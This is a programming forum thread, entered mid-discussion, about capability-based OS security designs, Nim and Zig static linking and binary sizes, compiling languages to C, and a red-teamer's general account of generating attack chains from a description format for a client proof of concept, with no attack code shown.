                                                            5. FreeBSD, under TrustedBSD, was originally doing something like SELinux, too. The Capsicum team gave them capability-security. That’s probably a better match for today’s security policies. However, one might be able to combine features from each project for stronger security.

                                                            6. OpenBSD kept a risky architecture but put an ultra-strong focus on code review and mitigations for specific attacks. It’s also hard to evaluate. It should be harder to attack, though, since most attackers focus on coding errors.

                                                            7. NetBSD and DragonflyBSD. I have no idea what their state of security is. Capsicum might be easy to integrate into NetBSD given they design for portability and easy maintenance.

                                                            8. High-security kernels. KeyKOS and EROS were all-in on the capability model. Separation kernels usually have capabilities as a memory access and/or communication mechanism, but policies are neutral for various security models. The consensus in high-assurance security is that the above OS’s need to be sandboxed entirely in their own process/VM space since there’s too much risk of them breaking. Security-critical components are to run outside of them on minimal runtimes and/or tiny kernels directly. These setups use separation kernels with VMM’s designed to work with them and something to generate IPC automatically for developer convenience. Capsicum theoretically could be ported to one but they’re easier to use directly.

                                                            9. Should throw in the IBM i series (formerly AS/400). The early version, System/38, described in this book, was capability-secure at the hardware level. They appear to have ditched hardware protections in favor of software checks. Unless I’m dated on it, it’s still a capability-based architecture at the low levels of the system, with PowerVM used to run Linux side-by-side to get its benefits. That makes it a competitor to Capsicum and the longest-running capability-based product in the market. Whereas the longest-running descriptor architecture, which also ditched full protections in hardware, is the Burroughs 5500, sold by Unisys as ClearPath Libra in its modern form.

                                                            1. 5

                                                              Nice listing, thanks! If you haven’t heard of it, and going in a slightly different direction, you may be interested in CheriBSD, which is a port of FreeBSD on top of capability hardware, the CHERI machine. (This makes it pretty much undeployable for now, but it’s interesting research that I expect to pay dividends in many ways.) The core people working on Capsicum are also working on CHERI.

                                                              1. 4

                                                                My post was mainly about the software side. On the hardware side, I’m following that really closely, along with research like Criswell’s SVA-OS (FreeBSD-based) and the Hardbound/Watchdog folks. They’re all doing great work making fundamental problems disappear with minimal performance hit. I was pushing some hardware people to port CHERI to Rocket RISC-V. There weren’t any takers. One company ported SAFE to RISC-V as CoreGuard.

                                                                CHERI is still one of my favorite possibilities, though. I plan to run CheriBSD if I ever get a hold of a FPGA board and the time to make adjustments.

                                                              2. 3

                                                                Wow, thank you for the extremely thorough reply (this is the sort of thing I really like about the lobste.rs community)!

                                                                It makes sense that there are multiple experiments and various OSes having a completely different approach (the hardware protection of System/38 you mentioned sounds particularly interesting), but I was mostly thinking about the POSIX OSes. The Capsicum design fits quite well into the POSIX model of the world.

                                                                I wonder why Apple did not follow through with Capsicum. They’re not too afraid to take good ideas from other OSes (dtrace comes to mind, and their userland comes mostly from FreeBSD IIRC).

                                                                1. 3

                                                                  Capsicum might be easy to integrate into NetBSD given they design for portability and easy maintenance

                                                                  There was a port of CloudABI to NetBSD, which kind of “includes” Capsicum (just not for NetBSD-native binaries).

                                                                  one might be able to combine features from each project for stronger security

                                                                  Indeed. Sandboxes protect the world from applications touching things they’re not supposed to; MAC things like TrustedBSD and SELinux were (at least originally) designed to implement policies on an organizational level, like documents having sensitivity levels (not secret, secret, top secret) and people having access only to levels lower than some value, etc.
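
                                                                  To illustrate those level rules, a toy Bell-LaPadula-style sketch in Python (my illustration, not actual SELinux policy): “no read up, no write down”.

                                                                      LEVELS = {"unclassified": 0, "secret": 1, "top_secret": 2}

                                                                      def can_read(subject: str, obj: str) -> bool:
                                                                          # Simple security property: read only at or below your level.
                                                                          return LEVELS[subject] >= LEVELS[obj]

                                                                      def can_write(subject: str, obj: str) -> bool:
                                                                          # *-property: write only at or above your level, so data
                                                                          # never flows downward.
                                                                          return LEVELS[subject] <= LEVELS[obj]

                                                                      assert can_read("secret", "unclassified")
                                                                      assert not can_read("secret", "top_secret")      # no read up
                                                                      assert not can_write("secret", "unclassified")   # no write down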

                                                                  1. 2

                                                                    Re CloudABI. Thanks for the tip.

                                                                    Re the 2nd paragraph: you’re on the right track but missing the overlap. SELinux came from the reference monitor concept, where every subject/object access was denied by default unless a security policy allowed it. So, sandboxing or, more properly, an isolation architecture done as strong as possible was the first layer. If anything, modern sandboxing is weaker at the same goal, lacking consistent enforcement by a simple mechanism.

                                                                    From there, you’re right that organizational design often influenced the policies. Since the military invented most INFOSEC, their rules, Multilevel Security, became the default, which the commercial sector couldn’t adopt easily. Type Enforcement was more flexible, handling military and some commercial designs. Note you could also do stuff like Biba to stop malware (deployed in Windows, too), enforce database integrity, or even keep competing companies from sharing resources. The mechanism itself wasn’t rooted in organizational stuff. That helped adoption.

                                                                    Eventually they just dropped policy enforcement out of the kernel entirely, so it did only separation. Middleware enforced custom policy. Still hotly debated, since it’s the most flexible but gives adopters plenty of rope. Hence language-based security coming back, with strong type systems and hardware/software schemes mitigating attacks entirely.

                                                                  2. 2

                                                                    High-security kernels.

                                                                    just to add, there’s also Coyotos in the EROS family, which gave us BitC, which is an interesting (if dead) language.

                                                                    Zircon is also working on an object capability model, but I haven’t looked too deeply at it myself.

                                                                    edit: Also, CapLore has some really interesting articles, such as this one on KeyKos…

                                                                    1. 2

                                                                      Yeah, they were interesting. People might find neat ideas looking into them. I left them off cuz Shapiro got poached by Microsoft before completing them.

                                                                      Far as Zircon, someone told me the developers were ex-Be, Danger, Palm, and Apple. None of those companies made high-security projects. The developers may or may not have done so at another company or in their spare time. This is important to me given that the only successes seem to come from people who learned the real thing from experienced people. Google’s NIH approach seems to consistently dodge using such people. Whereas Microsoft and IBM played it wise, hiring experts from high-security projects to do their initiatives. Got results, too. Google should’ve just hired CompSci folks specialized in this, like the NOVA people, plus some industry folks like those on Zircon, to keep things balanced between ideal architecture and realistic compromise.

                                                                      I’ll still give the final product a fair shake, regardless, though. I look forward to seeing what they come up with.

                                                                      1. 2

                                                                        totally agreed re: Google; I also have concerns about some of the items I’ve seen such as this, which discusses systems within Fuchsia that could be used for adverts, as well as Google’s tendency to do something cool and then drop it.

                                                                        Also, re: Shapiro: I think he’s interesting, but I also (having dealt with him on the mailing lists) wonder about his ability to produce, since Coyotos/EROS/and-so-on were largely embryonic (at best).

                                                                        1. 2

                                                                          re Google. They’re an ad company. Assume the worst. I even assumed Android itself would get locked up somehow over time, where we’d lose it, too. Maybe with a technique like this. Well, anything that wasn’t already open. We’re good so long as they open-source enough to build knock-off phones with better privacy and good-enough usability. People wanting best-in-class will be stuck with massive companies without reforms around patent suits and app store lock-in.

                                                                          re Shapiro. He was a professional researcher. Their incentives are sadly about how many papers they publish with new research results. Most don’t build much software at all, much less finish it. He was more focused than most, with the EROS team having a running prototype they demo’d at conferences. Since he’s about research, he started redoing it to fix its flaws instead of turning it into a finished product. They did open-source it in case anyone else wanted to do that. I’m not sure whether these going nowhere says something about him, FOSS developers’ priorities, or both. ;)

                                                                          1. 2

                                                                            Completely agreed re: Google. I don’t even disagree re: Shapiro either, but I’ll add one comment: I looked at the source code for EROS/Coyotos/BitC such that they were… it wasn’t something you could just dive into. Describing it as “hairy” and “embryonic” is about as kind as I can be for someone who has been awake since 0300 local.

                                                                            1. 2

                                                                              Thanks for the tip. Yeah, that’s another problem common with academics. It’s why I don’t even use stuff with great architecture if they coded it. I tell good coders about it hoping they’ll do something like it with good code. For some reason, the people good at one usually aren’t good at the other. (shrugs) Then you get those rare people like Paul Karger or Dan Bernstein that can do both. Rare.

                                                                              1. 2

                                                                                so Bernstein’s father was one of my professors in college; definitely an interesting fellow… I can at least see where the practical chops come from, since his father is a very practical (if nitpicky) coder himself.

                                                                                1. 2

                                                                                  That’s cool. I didn’t know his dad was a programmer. That makes sense.

                                                                    2. 1

                                                                      I never understood why NaCl didn’t take off. I loved that framework.

                                                                      1. 1

                                                                        I was never sure about that myself. A few guesses are:

                                                                        1. It’s hard to get any security tech adopted.

                                                                        2. Chrome was still having vulnerabilities, so NaCl might have been seen as ineffective.

                                                                        3. Could’ve been a burden to use.

                                                                        4. Other methods existed and were being developed that might have been more effective or usable.

                                                                    3. 3

                                                                      Unfortunately Google never accepted those changes :(

                                                                    1. 0

                                                                      You have a binary that is fast (2 ms), small (107 kB) and dependency-free.

                                                                      Ya, that’s true because Nim compiles to C! That C then gets compiled to a binary by gcc or clang (for example).

                                                                      So it’s not actually dependency-free… you’ll need a Unix environment at the very least to provide stdin/stdout I/O.

                                                                      Nevertheless it’s interesting – although I haven’t had the impression that it’s quite that unknown… I believe I first heard about it somewhere around 2014, and while I’ve never used it myself, I’ve seen articles about it from time to time.

                                                                      1. 6
                                                                        $ nim c hello.nim 
                                                                        Hint: used config file '/nix/store/ab449wa2wyaw1y6bifsfwqfyb429rw1x-nim-0.18.0/config/nim.cfg' [Conf]
                                                                        Hint: system [Processing]
                                                                        Hint: hello [Processing]
                                                                        CC: hello
                                                                        CC: stdlib_system
                                                                        Hint:  [Link]
                                                                        Hint: operation successful (11717 lines compiled; 2.748 sec total; 22.695MiB peakmem; Debug Build) [SuccessX]
                                                                        $ ./hello 
                                                                        Hello, world!
                                                                        $ ldd hello
                                                                        	linux-vdso.so.1 (0x00007ffe06dd1000)
                                                                        	libdl.so.2 => /nix/store/fg4yq8i8wd08xg3fy58l6q73cjy8hjr2-glibc-2.27/lib/libdl.so.2 (0x00007f4a0c356000)
                                                                        	libc.so.6 => /nix/store/fg4yq8i8wd08xg3fy58l6q73cjy8hjr2-glibc-2.27/lib/libc.so.6 (0x00007f4a0bfa2000)
                                                                        	/nix/store/fg4yq8i8wd08xg3fy58l6q73cjy8hjr2-glibc-2.27/lib/ld-linux-x86-64.so.2 => /nix/store/fg4yq8i8wd08xg3fy58l6q73cjy8hjr2-glibc-2.27/lib64/ld-linux-x86-64.so.2 (0x00007f4a0c55a000)
                                                                        $ ls -hal hello
                                                                        -rwxr-xr-x 1 andy users 185K Sep 22 15:53 hello
                                                                        

                                                                        This depends on libc and a runtime dynamic linker. If you built this on your machine and sent me this binary, I wouldn’t be able to run it, because NixOS doesn’t keep the dynamic linker at the usual hard-coded path.

                                                                        Can’t help but do a comparison here…

                                                                        $ time zig build-exe hello.zig 
                                                                        real	0m0.309s
                                                                        user	0m0.276s
                                                                        sys	0m0.035s
                                                                        $ ./hello 
                                                                        Hello, world!
                                                                        $ ldd hello
                                                                        	not a dynamic executable
                                                                        
                                                                        $ ls -ahl hello
                                                                        -rwxr-xr-x 1 andy users 390K Sep 22 16:01 hello
                                                                        
                                                                        1. 2

                                                                          I’ll be honest and say that I don’t know how to achieve this using C off the top of my head, but I’m willing to bet that it is possible. If it’s possible in C, it’s also possible in Nim.

                                                                          Please keep in mind that Nim links with libc dynamically by default; there is nothing stopping you from statically linking libc into your executables if you so wish.
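
                                                                          For example (a minimal sketch – the flags below are standard gcc and Nim options as I know them, not something from this thread or tested against the article’s setup):

                                                                          /* hello.c – toy program for checking static linking.
                                                                             Building with `gcc -static hello.c -o hello` should yield a
                                                                             binary that `ldd` reports as "not a dynamic executable";
                                                                             Nim can forward the same linker flag with --passL:-static. */
                                                                          #include <stdio.h>

                                                                          int main(void) {
                                                                              printf("Hello, world!\n");
                                                                              return 0;
                                                                          }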

                                                                          1. 1

                                                                            But will they still be as small?

                                                                            1. 2

                                                                              Of course not. But then I also don’t really care about binary sizes, as long as they’re not ridiculously large.

                                                                        2. 1

                                                                          I think that’s a pretty silly definition of dependency free

                                                                          1. 4

                                                                            I guess it depends on your perspective, but it does seem like an extremely pedantic definition. In that case, every Unix C program is dependent on a libc and a Unix kernel… but generally we don’t talk about dependencies like that.

                                                                            I will say this tho: I wish languages like nim & zig focused more on tree shaking to get down to the size of C, or as close as possible. Would help in other environments, such as the embedded space, and would be generally better for all.
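
                                                                            As a sketch of what I mean at the C level (the flags are the standard gcc/binutils dead-code-elimination options; the file and function names are made up for illustration):

                                                                            /* deadcode.c – link-time "tree shaking" in C.
                                                                               Compile each function into its own section and let the
                                                                               linker drop the unreferenced ones:
                                                                                 gcc -Os -ffunction-sections -fdata-sections deadcode.c \
                                                                                     -Wl,--gc-sections -o deadcode
                                                                               never_called() should not survive in the final binary. */
                                                                            #include <stdio.h>

                                                                            void never_called(void) {
                                                                                puts("this function is dead weight");
                                                                            }

                                                                            int main(void) {
                                                                                puts("only this path is live");
                                                                                return 0;
                                                                            }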

                                                                            1. 2

                                                                              I wish languages like nim & zig focused more on tree shaking to get down to the size of C, or as close as possible. Would help in other environments, such as the embedded space, and would be generally better for all.

                                                                              Do you have an example of how Zig doesn’t do this?

                                                                              1. 1

                                                                                (edit: also, I apologize for the late reply – I’m on client site this week)

                                                                                it’s been a while since I last built Zig (I use a local Homebrew, so I ended up having to manually link LLVM and Clang, which wasn’t bad once I figured out how to do so), but even the example displayed above was 390K, so potentially large parts of the Zig RTS are included therein. I think Zig is probably the best of the bunch (I’ve recommended several clients look into it as part of their roadmap for future embedded projects!), but I do think there’s some room for improvement wrt what’s included.

                                                                                As an aside, I thought I’d try and see if Zig was included in Homebrew now, but the build is dying:

                                                                                [ 65%] Built target embedded_softfloat
                                                                                make[1]: *** [CMakeFiles/embedded_lld_elf.dir/all] Error 2
                                                                                make: *** [all] Error 2
                                                                                
                                                                                1. 2

                                                                                  There are a few things to know about the size of the above example. One is that it’s a debug build, which means it has some extra safety stuff in there. It even has a full debug-symbol parsing implementation so that you get stack traces when your program crashes. On the other hand, if you use --release-small then you get a 96KB executable. (Side note: this could be further improved, and I have some open bug reports in LLVM to pursue this.) The other thing to note is that the executable is static. That means it is fully self-contained. The Nim version (and the equivalent C version) dynamically links against the C runtime, which is over 1MB.

                                                                                  So the Zig runtime is smaller than the C runtime.

                                                                                  I recommend waiting a week, until Zig 0.3.0 is out, before trying to get it from Homebrew. The Zig PR to Homebrew had llvm@6 in it to prevent this exact problem. They rejected that and said we had to drop the @ suffix. So naturally it broke when LLVM 7 came out.

                                                                                  1. 1

                                                                                    Oh, I realized that Zig was statically linked, but I did not realize that it had no further dependency on libc; that’s pretty interesting. Zig has been on my radar since I first caught wind of it some time ago (I enjoy languages & compilers; it’s part of my job & my hobby), and it’s neat to see no further links!

                                                                                    Previously I fought with getting Zig built out of git directly; the fighting was mostly around linking to the LLVM deps in Homebrew, because the two didn’t seem to like one another. Once it was working tho, it was pretty sweet, and I used it for some internal demos for clients. I’ll certainly wait for 0.3.0; it’ll be neat to see, esp. given the new info above!

                                                                                    1. 2

                                                                                      As of this morning 0.3.0 is out! And on the download page there are binaries available for Windows, MacOS, and Linux.

                                                                                      1. 2

                                                                                        Trying it now, and thank you so much! It runs right out of the box (which is so much easier than fighting with a local homebrew install) on Mojave!

                                                                            2. 1

                                                                              My point is that it couldn’t be executed in a Windows or Plan 9 environment. When people say the only IDE they need is Unix, it’s worth pointing out that this means they don’t need just a specific program, but a whole OS – and that’s a dependency in my eyes.

                                                                              1. 1

                                                                                WSL exists, and Plan 9 is an irrelevant research operating system. Something that depends on POSIX is depending on the portable operating system standard – a standard that portable software can rely on existing on every operating system. If your operating system doesn’t support POSIX, then you have no right to complain that software isn’t ported to it, IMO.

                                                                                You don’t need a particular OS; you need any OS out there that implements POSIX, which is all of them in common use.

                                                                                1. 1

                                                                                  I don’t care about rights, and that’s not what I meant. I understand your point, but what I wanted to say was that the way the author phrased it made me hope (naively, maybe) that there was some actual technology behind Nim that makes it OS-independent (since, as I’ve already said, I think an OS is a dependency, regardless of which standards may or may not exist).

                                                                          1. 3

                                                                            I think compiling to ‘readable’ C would be a good choice for a lot of projects. It would make using a less mainstream language waaaay less risky.

                                                                            1. 4

                                                                              I think interoperability with C is much more important than generating readable C. You’re generally not going to be interacting with the generated code, but it should be easy to link against it from C and vice versa. You get the same risk mitigation either way.

                                                                              I found generating “readable” C to be tricky, since it’s such a simple language and has no namespacing.
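
                                                                              To make the namespacing pain concrete, here’s the sort of output I mean – a made-up sketch for a hypothetical source module `vec` with a function `sum`, not output from any real compiler:

                                                                              /* "Readable" generated C fakes namespaces by prefixing,
                                                                                 which is the part that gets hairy as programs grow. */
                                                                              #include <stddef.h>
                                                                              #include <stdio.h>

                                                                              /* source: vec.sum(xs) --> generated: mylang_vec_sum(...) */
                                                                              double mylang_vec_sum(const double *xs, size_t n) {
                                                                                  double acc = 0.0;
                                                                                  for (size_t i = 0; i < n; i++)
                                                                                      acc += xs[i];
                                                                                  return acc;
                                                                              }

                                                                              int main(void) {
                                                                                  const double xs[] = {1.0, 2.0, 3.5};
                                                                                  /* a C caller can call this directly – interop for free */
                                                                                  printf("%g\n", mylang_vec_sum(xs, 3));
                                                                                  return 0;
                                                                              }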

                                                                              1. 3

                                                                                For adoption, my default recommendation now is using C’s types, its calling conventions, automatically recognizing its libraries in FFI, and compiling to readable C. Better to be using the C ecosystem than competing with it entirely.

                                                                                1. 4

                                                                                  For adoption, my default recommendation now is using C’s types, its calling conventions, automatically recognizing its libraries in FFI, and compiling to readable C.

                                                                                  I’ve focused on that in my last two compilers; it’s pretty fun to ship code to clients who don’t even know you’re writing in something else.

                                                                                  1. 2

                                                                                    Yeah. I used to do it with an enhanced BASIC. They were talking about me using a “real” language. Lulz.

                                                                              1. 3

                                                                                myrddin is such a fun language, I encourage everyone to give it a try.

                                                                                1. 1

                                                                                  have you written anything major in it? I like the fact that it supports most of the platforms I use, but I haven’t seen much written in it…

                                                                                  1. 2

                                                                                    I wrote the C compiler mentioned in that post and a few command line utilities like https://github.com/andrewchambers/ddmin . The compiler code was probably the biggest thing I wrote.

                                                                                    1. 1

                                                                                      oh that’s beautiful, thank you! Are there any pain points you’ve experienced with using it?

                                                                                      1. 3

                                                                                        Not much pain really; it’s just a small project, so you can’t expect too many libraries – be patient with the docs and help fix them if you can.

                                                                                1. 3

                                                                                  I didn’t know about this one. Thanks!

                                                                                  They cite the folks in the FLINT group, who I assumed invented the optimizing part. Turns out they may have invented the type-based part, then this team did the optimizing, and people went from there. Those publications are here, with the stuff this paper cites at the bottom, since it’s older. For those interested in verified compilers, I also cited this kind of work in some discussions, since they applied type-driven compilation to that. An example is Type-Based, Certifying Code (slides), which builds on Necula’s Proof-Carrying Code (see Bibliography).

                                                                                  1. 2

                                                                                    I didn’t either! Like you, I had seen the others, but I hadn’t seen this one, and stumbled upon it this morning. I was looking for Luca Cardelli’s Compiling a Functional Language and his Amber paper and found this.

                                                                                    1. 4

                                                                                      I’m still not convinced Luca Cardelli isn’t three geniuses in a trench coat. The amount of research output from that one person is incredible.

                                                                                      Same with Peyton-Jones.

                                                                                      1. 2

                                                                                        I’m with you on that. I didn’t want to waste his time tagging him in anything less than Modula-4 or a Rust killer. ;)

                                                                                  1. 3

                                                                                    what’s the date on this?

                                                                                    1. 3

                                                                                      looks like it’s from 1996

                                                                                      1. 2

                                                                                        what’s the date on this?

                                                                                        What, you don’t think the DEC Alpha is a modern, relevant architecture? /s

                                                                                        1. 1

                                                                                          Funny enough, the folks at crash-safe.org built their first prototype as an Alpha. I was like, “Huh? Couldn’t it be something that wasn’t buried by Intel and Fujitsu?”

                                                                                        2. 1

                                                                                          looks like 1996 or so, based on which ACM journal it was going to hit.

                                                                                        1. 3

                                                                                          I have many times, mainly for purposes of program synthesis.

                                                                                          I think it’s quite useful, esp. if you’re iterating on a problem and looking for some way to describe that problem naturally, without having to think about implementation details.

                                                                                          1. 2

                                                                                            Sounds interesting, can you share any more details about this work?

                                                                                            1. 3

                                                                                              absolutely! I work as “red team” (previously in adversary simulation, currently in more technical correctness types of situations), so very often I’m presented with:

                                                                                              1. some set of “things” I need to “do” (API calls, native or web; some format I need to construct; some code I need to generate many copies of with minor variance; what-have-you)
                                                                                              2. a system that I’m not supposed to be on with limited tooling (“living off the land”)
                                                                                              3. with a large amount of repetition

                                                                                              so often the easiest way is to simply write something in a simpler format that generates the steps above so that attack chains can be more easily constructed.

                                                                                              A simple example was that I had Remote Code Execution on a host via two languages (one was the platform’s scripting language, the other was native Unix/Windows shell), but only 100 characters at a time (as they were packed in images, with no bindings to Python). So, rather than attempt to write a Python binding or fight with making a generic system using the libraries provided, I:

                                                                                              1. wrote a simple description format (creds, commands to be run, host, &c)
                                                                                              2. wrote a compiler from that format to the long, horrible chain of things I just described, which produced “ok” C
                                                                                              3. delivered that to team + client for proof of concept

                                                                                              it’s a weird example of basically partial evaluation, but it works for me, and is usually easier for me to digest than attempting to get all the moving pieces in one go. There’s a toy sketch of the chunking step below.
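
                                                                                              To make the 100-character constraint concrete (the staging path, payload, and echo-append trick here are illustrative assumptions, not the actual tooling I delivered):

                                                                                              /* chunker.c – split a long shell command into <=100-character
                                                                                                 pieces that append to a staging file, which the final line
                                                                                                 then executes. Purely illustrative. */
                                                                                              #include <stdio.h>
                                                                                              #include <string.h>

                                                                                              #define LIMIT 100

                                                                                              static void emit_chunks(const char *payload) {
                                                                                                  /* per-chunk overhead: echo -n '' >> /tmp/s */
                                                                                                  const size_t overhead = strlen("echo -n '' >> /tmp/s");
                                                                                                  size_t step = LIMIT - overhead;
                                                                                                  size_t len = strlen(payload);
                                                                                                  for (size_t i = 0; i < len; i += step) {
                                                                                                      size_t n = len - i < step ? len - i : step;
                                                                                                      printf("echo -n '%.*s' >> /tmp/s\n", (int)n, payload + i);
                                                                                                  }
                                                                                                  printf("sh /tmp/s\n");
                                                                                              }

                                                                                              int main(void) {
                                                                                                  emit_chunks("some long command chain that will not fit in one 100-character message");
                                                                                                  return 0;
                                                                                              }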

                                                                                          1. 5

                                                                                            After using Yesql and HugSQL in Clojure, I liked the approach so much that we ended up building a similar solution in OCaml, where we have a PPX that just generates all the annoying boilerplate required to run SQL queries and exposes a type-safe interface to it. It is not an ORM, so it is very clear how the code maps to SQL, and it is also rather simple to implement, without having to worry about impedance mismatch. Of course, it doesn’t handle migrations or the like, but those are outside the scope of the system.

                                                                                            Initial impressions from internal users were enthusiastic.

                                                                                            1. 1

                                                                                              we ended up building a similar solution in OCaml

                                                                                              that sounds interesting; has it been released anywhere?

                                                                                              1. 2

                                                                                                It is a very early release and I expect there will still be a number of changes, which is why we haven’t submitted it to OPAM yet, but you can check out ppx_mysql.

                                                                                                In spirit it is similar to PG’OCaml, but PG’OCaml talks to Postgres at compile time, which MySQL can’t do – and I also prefer not to require talking to external services when building – so all the type information has to be specified manually.

                                                                                                1. 1

                                                                                                  oh interesting, I’ll definitely check this out! The idea sounds intriguing, and I enjoyed working with PG’OCaml previously, for what little I had to do with it. Thank you very much!

                                                                                            1. 3

                                                                                              this is bait. do not execute a random obfuscated python script.

                                                                                              1. 2

                                                                                                oh ja, that’s for sure. Don’t execute random anything, but the style is definitely written to mimic the various tools we see in the space at the very least.

                                                                                                I think my fav comment to this was responding to the “my ssh tool is too dangerous to release” thing; definitely going for the “we have an internet badass over here” direction, even if unintentionally.

                                                                                                1. 2

                                                                                                   It’s odd – the author says that the tool is too dangerous to release, but then they released it anyway.

                                                                                                  1. 1

                                                                                                     in the past that was often done for “cred,” to make things look more badass than they actually were. Here I have no idea, but it came across as silly to me.